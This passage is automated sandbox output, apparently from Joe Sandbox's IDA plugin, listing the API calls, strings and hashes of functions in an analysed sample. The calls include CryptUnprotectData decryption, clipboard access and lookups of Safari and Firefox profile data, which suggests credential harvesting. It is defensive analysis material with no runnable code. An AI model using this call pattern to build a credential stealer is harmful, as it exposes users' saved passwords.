                                                      • API String ID: 1936579350-0
                                                      • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                      • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                      • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                      • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                      • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                      • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                      • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                      • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                      • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                      • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: free
                                                      • String ID:
                                                      • API String ID: 1294909896-0
                                                      • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                      • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                      • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                      • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                      APIs
                                                      • EmptyClipboard.USER32 ref: 004098EC
                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                      • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                      • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                      • GetLastError.KERNEL32 ref: 0040995D
                                                      • CloseHandle.KERNEL32(?), ref: 00409969
                                                      • GetLastError.KERNEL32 ref: 00409974
                                                      • CloseClipboard.USER32 ref: 0040997D
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                      • String ID:
                                                      • API String ID: 3604893535-0
                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                      • API String ID: 2780580303-317687271
                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                      APIs
                                                      • EmptyClipboard.USER32 ref: 00409882
                                                      • wcslen.MSVCRT ref: 0040988F
                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                      • CloseClipboard.USER32 ref: 004098D7
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                      • String ID:
                                                      • API String ID: 1213725291-0
                                                      • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                      • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                      APIs
                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                      • free.MSVCRT ref: 00418370
                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7556DF80,?,0041755F,?), ref: 00417452
                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                      • String ID: OsError 0x%x (%u)
                                                      • API String ID: 2360000266-2664311388
                                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@memcpymemset
                                                      • String ID:
                                                      • API String ID: 1865533344-0
                                                      • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                      • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                      APIs
                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: NtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 4255912815-0
                                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                      APIs
                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                      • memset.MSVCRT ref: 0040265F
                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                      • API String ID: 2929817778-1134094380
                                                      • Opcode ID: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                      • Opcode Fuzzy Hash: 50789d42b67ef9cbe8ec8181fd3a7e8d092fde0b3f08ce177d697f6554f1c07e
                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                      • String ID: :stringdata$ftp://$http://$https://
                                                      • API String ID: 2787044678-1921111777
                                                      • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                      • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                      • GetDC.USER32 ref: 004140E3
                                                      • wcslen.MSVCRT ref: 00414123
                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                      • _snwprintf.MSVCRT ref: 00414244
                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                      • String ID: %s:$EDIT$STATIC
                                                      • API String ID: 2080319088-3046471546
                                                      • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                      • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                      APIs
                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                      • memset.MSVCRT ref: 00413292
                                                      • memset.MSVCRT ref: 004132B4
                                                      • memset.MSVCRT ref: 004132CD
                                                      • memset.MSVCRT ref: 004132E1
                                                      • memset.MSVCRT ref: 004132FB
                                                      • memset.MSVCRT ref: 00413310
                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                      • memset.MSVCRT ref: 004133C0
                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                      • wcscpy.MSVCRT ref: 0041341F
                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                      Strings
                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                      • {Unknown}, xrefs: 004132A6
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                      • API String ID: 4111938811-1819279800
                                                      • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                      • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                      • String ID:
                                                      • API String ID: 829165378-0
                                                      • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                      • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                      APIs
                                                      • memset.MSVCRT ref: 00404172
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                      • wcscpy.MSVCRT ref: 004041D6
                                                      • wcscpy.MSVCRT ref: 004041E7
                                                      • memset.MSVCRT ref: 00404200
                                                      • memset.MSVCRT ref: 00404215
                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                      • wcscpy.MSVCRT ref: 00404242
                                                      • memset.MSVCRT ref: 0040426E
                                                      • memset.MSVCRT ref: 004042CD
                                                      • memset.MSVCRT ref: 004042E2
                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                      • wcscpy.MSVCRT ref: 00404311
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2040628625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000C.00000002.2040628625.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2040628625.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                      • API String ID: 2454223109-1580313836
